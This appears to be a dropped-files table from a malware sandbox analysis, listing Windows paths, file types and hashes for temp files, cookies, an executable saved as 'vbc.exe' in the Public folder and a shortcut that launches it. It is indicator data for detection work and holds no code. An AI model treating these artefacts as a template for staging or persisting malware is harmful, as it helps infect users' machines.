C:\Users\user\AppData\Local\Temp\~DF6138EF3239C89CAA.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFDD0AA16FA1AF46B3.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFEF1C1027FB9769E7.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFFB7AE34A177A8EA8.TMP	CDFV2 Encrypted	8305DC6702F80D7EBE34CD8C63297561	DB055CCE075213D510DE5CA9044EA76036DBCD07	9EAE576F7ECC05F106A7CFA605B1CA5BCD02C8D1C2C926920C0D7F0CB605B345
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\1020B0BE.txt	ASCII text	ABD12F1C0B4E39B1BF5214FCD2A5AAAA	DB75BD2BCF4EC9A53639CE6D5406DEEEFCFBC759	7F4C58DAE173EBFB0AC54F30037DE30C76188E758648E05B72755A9CA94C9C28
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NPAI0NCY.txt	Unknown	829EBDA80C973BEC9588898598992144	FA0E07B5AAE0FB38E78D7F2843CC71B3B3159628	4B8AD7C735D6EDFF81FCDC15D0A0920EE4F25AEBA4C43CB62DB50FCC9E6B6C75
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\OG4AVE13.txt	Unknown	65FC7145617D31840F0FAF6011948523	D0BF6CD01FF08F18CBB65A43659EDE4A468494FC	1ADAFF33442C89AF0A9A6DB8A8F8C7C313BAEC1B4A3CED703B339233651D6D46
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\SKCEWK32.txt	ASCII text	37B5D47F98EA3BCC813A2A012DA26F78	80EB486A4CEE48FC96BE02E6C85F876C0DFB6285	670FD8BDC66132341984399409D169C956BA32A9A912997F995C210EA6DC83F9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\TMLQ6DN1.txt	ASCII text	191C207915FFCD42C751848D0D51F583	CFD758449FF09D13B1CA44E1D27436DD3456E82D	7B0D70EC5CF82096B74488B579263F72425826488BC91EEC635A4AAF3D73B466
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZVY3IDY2.txt	ASCII text	61DB77F3FE957F222F97D77038C49FBB	6895FC3D407837B379185E80F80888E138931421	016D9BD79DC2CC206FD1E604F5DDC3483D963EF381D22E9DD30C52C2B97BEA5B
C:\Users\user\Desktop\~$7009.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\user\Odhbljup.exe	PE32 executable (GUI) Intel 80386, for MS Windows	3A9AE96D1F6404FCCF5BD99B7C5C0383	2D0444EF8FE64348EEE4D748B0528E3799D18304	B8AA3A9C721EAE2745F1671B70869A8E3FE847A16E769D69C40727857BA54B44
C:\Users\user\pujlbhdO.url	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Odhbljup.exe">), ASCII text, with CRLF line terminators	576781B47BF29FF0E3281E0DF79F44C1	A6AC102F6E4397E9F6E5DAA395A72ED03C49B438	6F016734B2296FC4FC227D94D4976A43FB825F097294E3640F806482FAB6B397
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	3A9AE96D1F6404FCCF5BD99B7C5C0383	2D0444EF8FE64348EEE4D748B0528E3799D18304	B8AA3A9C721EAE2745F1671B70869A8E3FE847A16E769D69C40727857BA54B44